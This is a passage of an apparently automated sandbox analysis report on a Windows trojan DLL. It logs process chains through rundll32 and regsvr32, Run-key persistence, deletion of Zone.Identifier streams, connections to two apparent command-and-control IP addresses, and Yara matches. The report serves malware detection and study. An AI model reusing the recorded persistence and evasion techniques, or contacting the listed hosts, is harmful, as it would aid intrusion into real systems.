                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180028C945_2_0000000180028C94
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800038A55_2_00000001800038A5
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800248E05_2_00000001800248E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180005DB45_2_0000000180005DB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180004DDC5_2_0000000180004DDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000B1E05_2_000000018000B1E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180009E385_2_0000000180009E38
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180003BE85_2_0000000180003BE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180009BEC5_2_0000000180009BEC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800173F85_2_00000001800173F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180017BF85_2_0000000180017BF8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800154005_2_0000000180015400
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800010005_2_0000000180001000
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000741C5_2_000000018000741C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000E8285_2_000000018000E828
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800028345_2_0000000180002834
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180014C485_2_0000000180014C48
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018002005C5_2_000000018002005C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800164645_2_0000000180016464
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800054785_2_0000000180005478
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800068805_2_0000000180006880
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018002748C5_2_000000018002748C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001308C5_2_000000018001308C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800240985_2_0000000180024098
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001B8985_2_000000018001B898
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000C4985_2_000000018000C498
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180004CA05_2_0000000180004CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800110AC5_2_00000001800110AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800148B05_2_00000001800148B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800078B65_2_00000001800078B6
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180001CCC5_2_0000000180001CCC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000B8D05_2_000000018000B8D0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800198DC5_2_00000001800198DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800038DC5_2_00000001800038DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800264F85_2_00000001800264F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800084F85_2_00000001800084F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000BD005_2_000000018000BD00
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800155085_2_0000000180015508
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180018D0C5_2_0000000180018D0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800121105_2_0000000180012110
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001B5205_2_000000018001B520
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800291245_2_0000000180029124
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800135245_2_0000000180013524
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180009D245_2_0000000180009D24
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180023D285_2_0000000180023D28
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800021285_2_0000000180002128
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800209305_2_0000000180020930
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800091445_2_0000000180009144
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001F5505_2_000000018001F550
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180020D545_2_0000000180020D54
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800109545_2_0000000180010954
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800185605_2_0000000180018560
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000E5705_2_000000018000E570
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001C9745_2_000000018001C974
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000F1745_2_000000018000F174
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180025D845_2_0000000180025D84
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800055905_2_0000000180005590
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800171985_2_0000000180017198
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800159A05_2_00000001800159A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180011DAC5_2_0000000180011DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000D1AC5_2_000000018000D1AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800069C05_2_00000001800069C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000A1D45_2_000000018000A1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800079D85_2_00000001800079D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001C1DC5_2_000000018001C1DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000D1E05_2_000000018000D1E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800199E85_2_00000001800199E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800099EC5_2_00000001800099EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180028A045_2_0000000180028A04
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001FA085_2_000000018001FA08
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001E6145_2_000000018001E614
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180001A1C5_2_0000000180001A1C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000BA245_2_000000018000BA24
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180021A2C5_2_0000000180021A2C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800192305_2_0000000180019230
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000BE345_2_000000018000BE34
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800122445_2_0000000180012244
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800066505_2_0000000180006650
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800016605_2_0000000180001660
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800116645_2_0000000180011664
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001827C5_2_000000018001827C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800246805_2_0000000180024680
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180022A845_2_0000000180022A84
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000AE845_2_000000018000AE84
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800286905_2_0000000180028690
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800156945_2_0000000180015694
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800076945_2_0000000180007694
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800136985_2_0000000180013698
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800092985_2_0000000180009298
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018002629C5_2_000000018002629C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001629C5_2_000000018001629C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000569C5_2_000000018000569C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180027EA45_2_0000000180027EA4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800096B85_2_00000001800096B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000EAC45_2_000000018000EAC4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180018ECC5_2_0000000180018ECC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001B2F05_2_000000018001B2F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180007AF05_2_0000000180007AF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000E7085_2_000000018000E708
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: UNUy8dUYWp.dllVirustotal: Detection: 43%
                      Source: UNUy8dUYWp.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\UNUy8dUYWp.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UNUy8dUYWp.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\UNUy8dUYWp.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UNUy8dUYWp.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\UNUy8dUYWp.dll,DllRegisterServer
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MKDOLrYWnU\ZnvQHBfFrAXKVU.dll"
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\CoOkhAHrtQc\nRwgXrJuSZa.dll"
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GoWbi\ladheq.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RQcUhJCVUMzw\oVbDosZga.dll"
                      Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\MKDOLrYWnU\ZnvQHBfFrAXKVU.dll
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\FWERpTiWwMFl\CxZPHYYNr.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UNUy8dUYWp.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\UNUy8dUYWp.dllJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\UNUy8dUYWp.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RQcUhJCVUMzw\oVbDosZga.dll"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UNUy8dUYWp.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GoWbi\ladheq.dll"Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MKDOLrYWnU\ZnvQHBfFrAXKVU.dll"Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\CoOkhAHrtQc\nRwgXrJuSZa.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\FWERpTiWwMFl\CxZPHYYNr.dll"Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Users\user\AppData\Local\FWERpTiWwMFl\Jump to behavior
                      Source: classification engineClassification label: mal84.troj.evad.winDLL@21/2@0/49
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C113CB0 CreateWindowExW,RegisterTouchWindow,MessageBoxW,CoCreateInstance,new,ShowWindow,UpdateWindow,0_2_00007FF87C113CB0
                      Source: C:\Windows\System32\loaddll64.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180005DB4 FindCloseChangeNotification,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,0_2_0000000180005DB4
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UNUy8dUYWp.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_01
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
                      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
                      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
                      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
                      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: UNUy8dUYWp.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: UNUy8dUYWp.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: UNUy8dUYWp.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: UNUy8dUYWp.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: UNUy8dUYWp.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: UNUy8dUYWp.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: UNUy8dUYWp.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: UNUy8dUYWp.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                      Source: UNUy8dUYWp.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: UNUy8dUYWp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: UNUy8dUYWp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: UNUy8dUYWp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: UNUy8dUYWp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: UNUy8dUYWp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C108909 push rdi; ret 0_2_00007FF87C108912
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C10837D push rdi; ret 0_2_00007FF87C108384
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E0D3 push 09B8E1F7h; retf 0_2_000000018001E0DD
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E0E9 push 8B48E1F7h; retf 0_2_000000018001E0F1
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180023127 push ebp; ret 0_2_0000000180023128
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E5C5 pushad ; ret 0_2_000000018001E5C7
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180022E55 push ebp; retf 0_2_0000000180022E56
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180023A7E push ebp; ret 0_2_0000000180023A86
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180022F5E push ebp; ret 0_2_0000000180022F64
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000838C push eax; ret 0_2_000000018000838E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF87C108909 push rdi; ret 3_2_00007FF87C108912
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF87C10837D push rdi; ret 3_2_00007FF87C108384
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E0D3 push 09B8E1F7h; retf 3_2_000000018001E0DD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E0E9 push 8B48E1F7h; retf 3_2_000000018001E0F1
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023127 push ebp; ret 3_2_0000000180023128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E5C5 pushad ; ret 3_2_000000018001E5C7
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022E55 push ebp; retf 3_2_0000000180022E56
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023A7E push ebp; ret 3_2_0000000180023A86
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022F5E push ebp; ret 3_2_0000000180022F64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000838C push eax; ret 3_2_000000018000838E
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E0D3 push 09B8E1F7h; retf 4_2_000000018001E0DD
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E0E9 push 8B48E1F7h; retf 4_2_000000018001E0F1
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180023127 push ebp; ret 4_2_0000000180023128
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E5C5 pushad ; ret 4_2_000000018001E5C7
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180022E55 push ebp; retf 4_2_0000000180022E56
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180023A7E push ebp; ret 4_2_0000000180023A86
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180022F5E push ebp; ret 4_2_0000000180022F64
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000838C push eax; ret 4_2_000000018000838E
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001E0D3 push 09B8E1F7h; retf 5_2_000000018001E0DD
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001E0E9 push 8B48E1F7h; retf 5_2_000000018001E0F1
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180023127 push ebp; ret 5_2_0000000180023128
                      Source: UNUy8dUYWp.dllStatic PE information: section name: .gxfg
                      Source: UNUy8dUYWp.dllStatic PE information: section name: .gehcont
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\UNUy8dUYWp.dll
                      Source: C:\Windows\System32\rundll32.exePE file moved: C:\Windows\System32\MKDOLrYWnU\ZnvQHBfFrAXKVU.dllJump to behavior

                      Boot Survival

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZnvQHBfFrAXKVU.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZnvQHBfFrAXKVU.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZnvQHBfFrAXKVU.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\loaddll64.exeFile opened: C:\Windows\system32\RQcUhJCVUMzw\oVbDosZga.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\GoWbi\ladheq.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\MKDOLrYWnU\ZnvQHBfFrAXKVU.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\CoOkhAHrtQc\nRwgXrJuSZa.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\FWERpTiWwMFl\CxZPHYYNr.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 5536Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll64.exeAPI coverage: 9.2 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 9.0 %
                      Source: C:\Windows\System32\loaddll64.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C10C334 FindFirstFileExW,0_2_00007FF87C10C334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF87C10C334 FindFirstFileExW,3_2_00007FF87C10C334
                      Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: regsvr32.exe, 00000006.00000003.557492569.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.699977806.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.556290828.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.558301745.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559860580.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.699876188.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C104944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF87C104944
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C10DD90 GetProcessHeap,0_2_00007FF87C10DD90
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C104944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF87C104944
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C103AD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF87C103AD0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C109474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF87C109474
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF87C104944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF87C104944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF87C103AD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF87C103AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF87C109474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF87C109474

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 115.178.55.22 80Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.105.115.71 8080Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UNUy8dUYWp.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C10AB50 cpuid 0_2_00007FF87C10AB50
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF87C104A94 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF87C104A94

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 3.2.regsvr32.exe.fa0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.fa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.15cc5300000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.2c323270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.15cc5300000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.regsvr32.exe.6b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.a00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.a00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.regsvr32.exe.6b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.225b3ac0000.0.unpack, type: UNPACKEDPE
